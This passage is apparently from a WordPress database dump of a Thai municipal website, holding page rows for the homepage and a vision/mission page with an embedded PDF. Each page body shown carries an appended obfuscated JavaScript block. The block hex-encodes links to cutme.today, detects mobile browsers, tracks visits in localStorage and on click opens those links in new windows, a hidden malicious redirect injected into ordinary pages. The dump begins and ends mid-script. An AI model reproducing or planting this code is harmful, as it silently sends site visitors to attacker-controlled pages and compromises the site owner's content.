)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 17:21:39','2024-08-07 10:21:39','',14,'http://pakhaeng.ssk.in.th/?p=655',0,'revision','',0),
(656,1,'2024-08-07 17:23:14','2024-08-07 10:23:14','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":657,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"วิสัยทัศน์\"></object><a id=\"wp-block-file--media-67822f14-c298-498e-8d6f-cb62df4f685b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\">วิสัยทัศน์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-67822f14-c298-498e-8d6f-cb62df4f685b\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิสัยทัศน์/พันธกิจ/เป้าประสงค์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b4%e0%b8%aa%e0%b8%b1%e0%b8%a2%e0%b8%97%e0%b8%b1%e0%b8%a8%e0%b8%99%e0%b9%8c-%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b8%81%e0%b8%b4%e0%b8%88-%e0%b9%80%e0%b8%9b%e0%b9%89%e0%b8%b2%e0%b8%9b','','','2024-08-07 17:23:15','2024-08-07 10:23:15','',0,'http://pakhaeng.ssk.in.th/?page_id=656',0,'page','',0),
(657,1,'2024-08-07 17:23:07','2024-08-07 10:23:07','','วิสัยทัศน์','','inherit','','closed','','%e0%b8%a7%e0%b8%b4%e0%b8%aa%e0%b8%b1%e0%b8%a2%e0%b8%97%e0%b8%b1%e0%b8%a8%e0%b8%99%e0%b9%8c','','','2024-08-07 17:23:07','2024-08-07 10:23:07','',656,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf',0,'attachment','application/pdf',0),
(658,1,'2024-08-07 17:23:14','2024-08-07 10:23:14','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":657,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"วิสัยทัศน์\"></object><a id=\"wp-block-file--media-67822f14-c298-498e-8d6f-cb62df4f685b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\">วิสัยทัศน์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/วิสัยทัศน์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-67822f14-c298-498e-8d6f-cb62df4f685b\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 